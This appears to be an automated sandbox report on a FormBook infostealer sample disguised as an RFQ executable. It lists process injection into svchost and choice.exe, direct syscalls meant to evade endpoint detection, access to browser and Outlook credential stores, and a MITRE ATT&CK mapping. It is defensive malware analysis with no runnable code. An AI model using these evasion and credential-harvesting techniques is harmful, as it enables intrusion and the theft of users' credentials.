Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A62F98 mov eax, dword ptr fs:[00000030h]	10_2_03A62F98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4CFE0 mov eax, dword ptr fs:[00000030h]	10_2_03A4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4CFE0 mov eax, dword ptr fs:[00000030h]	10_2_03A4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A70FF6 mov eax, dword ptr fs:[00000030h]	10_2_03A70FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A70FF6 mov eax, dword ptr fs:[00000030h]	10_2_03A70FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A70FF6 mov eax, dword ptr fs:[00000030h]	10_2_03A70FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A70FF6 mov eax, dword ptr fs:[00000030h]	10_2_03A70FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03B04FE7 mov eax, dword ptr fs:[00000030h]	10_2_03B04FE7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AE6FF7 mov eax, dword ptr fs:[00000030h]	10_2_03AE6FF7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A32FC8 mov eax, dword ptr fs:[00000030h]	10_2_03A32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A32FC8 mov eax, dword ptr fs:[00000030h]	10_2_03A32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A32FC8 mov eax, dword ptr fs:[00000030h]	10_2_03A32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A32FC8 mov eax, dword ptr fs:[00000030h]	10_2_03A32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2EFD8 mov eax, dword ptr fs:[00000030h]	10_2_03A2EFD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2EFD8 mov eax, dword ptr fs:[00000030h]	10_2_03A2EFD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2EFD8 mov eax, dword ptr fs:[00000030h]	10_2_03A2EFD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5EF28 mov eax, dword ptr fs:[00000030h]	10_2_03A5EF28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AE6F00 mov eax, dword ptr fs:[00000030h]	10_2_03AE6F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A32F12 mov eax, dword ptr fs:[00000030h]	10_2_03A32F12
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6CF1F mov eax, dword ptr fs:[00000030h]	10_2_03A6CF1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5AF69 mov eax, dword ptr fs:[00000030h]	10_2_03A5AF69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5AF69 mov eax, dword ptr fs:[00000030h]	10_2_03A5AF69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD2F60 mov eax, dword ptr fs:[00000030h]	10_2_03AD2F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD2F60 mov eax, dword ptr fs:[00000030h]	10_2_03AD2F60

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_004580A9

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042A155
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0042A124 SetUnhandledExceptionFilter,	0_2_0042A124
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00BB1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00BB1361
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00BB4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00BB4C7B

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtMapViewOfSection: Direct from: 0x77762D1C	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtNotifyChangeKey: Direct from: 0x77763C2C	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtCreateMutant: Direct from: 0x777635CC	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtResumeThread: Direct from: 0x777636AC	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtTerminateThread: Direct from: 0x77757B2E	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtQuerySystemInformation: Direct from: 0x77762DFC	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtDelayExecution: Direct from: 0x77762DDC	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtQueryInformationProcess: Direct from: 0x77762C26	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtAllocateVirtualMemory: Direct from: 0x77763C9C	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtSetInformationThread: Direct from: 0x77762B4C	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtQueryAttributesFile: Direct from: 0x77762E6C	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtCreateKey: Direct from: 0x77762C6C	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtQuerySystemInformation: Direct from: 0x777648CC	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtOpenSection: Direct from: 0x77762E0C	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtAllocateVirtualMemory: Direct from: 0x77762BEC	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtQueryInformationToken: Direct from: 0x77762CAC	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtTerminateThread: Direct from: 0x77762FCC	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtCreateFile: Direct from: 0x77762FEC	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtOpenFile: Direct from: 0x77762DCC	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtOpenKeyEx: Direct from: 0x77762B9C	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtSetInformationProcess: Direct from: 0x77762C5C	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\choice.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: NULL target: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: NULL target: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: NULL target: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: NULL target: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\choice.exe

Thread register set: target process: 1196

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\choice.exe

Thread APC queued: target process: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2E0E008

Jump to behavior

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_004587B1 LogonUserW,

0_2_004587B1

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403B3A

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_004048D7

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_00464C53 mouse_event,

0_2_00464C53

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe"	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	Process created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00457CAF

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0045874B

Source: RFQ _ Virtue 054451000085.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RFQ _ Virtue 054451000085.exe, iavbXasnTxCeiF.exe, 0000000D.00000002.2749580979.0000000001910000.00000002.00000001.00040000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000000.1866674762.0000000001910000.00000002.00000001.00040000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751135018.0000000001450000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: iavbXasnTxCeiF.exe, 0000000D.00000002.2749580979.0000000001910000.00000002.00000001.00040000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000000.1866674762.0000000001910000.00000002.00000001.00040000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751135018.0000000001450000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: iavbXasnTxCeiF.exe, 0000000D.00000002.2749580979.0000000001910000.00000002.00000001.00040000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000000.1866674762.0000000001910000.00000002.00000001.00040000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751135018.0000000001450000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: iavbXasnTxCeiF.exe, 0000000D.00000002.2749580979.0000000001910000.00000002.00000001.00040000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000000.1866674762.0000000001910000.00000002.00000001.00040000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751135018.0000000001450000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_0042862B cpuid

0_2_0042862B

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST9E64.tmp VolumeInformation	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST9E74.tmp VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00434E87

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_00441E06 GetUserNameW,

0_2_00441E06

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00433F3A

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004049A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 10.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2750875662.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2742686769.0000000002310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1948226001.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1950189449.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2751208214.00000000041F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1952345279.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2753929696.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2750881056.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\choice.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\choice.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: RFQ _ Virtue 054451000085.exe	Binary or memory string: WIN_81
Source: RFQ _ Virtue 054451000085.exe	Binary or memory string: WIN_XP
Source: RFQ _ Virtue 054451000085.exe	Binary or memory string: WIN_XPe
Source: RFQ _ Virtue 054451000085.exe	Binary or memory string: WIN_VISTA
Source: RFQ _ Virtue 054451000085.exe	Binary or memory string: WIN_7
Source: RFQ _ Virtue 054451000085.exe	Binary or memory string: WIN_8
Source: RFQ _ Virtue 054451000085.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 10.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2750875662.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2742686769.0000000002310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1948226001.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1950189449.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2751208214.00000000041F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1952345279.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2753929696.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2750881056.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00476283
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00476747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	2 LSASS Driver	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Service Execution	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 LSASS Driver	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Windows Service	1 DLL Side-Loading	3 Obfuscated Files or Information	NTDS	126 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	2 Valid Accounts	1 Software Packing	LSA Secrets	251 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	21 Access Token Manipulation	1 Timestomp	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Windows Service	1 DLL Side-Loading	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	412 Process Injection	222 Masquerading	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Valid Accounts	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	2 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	21 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
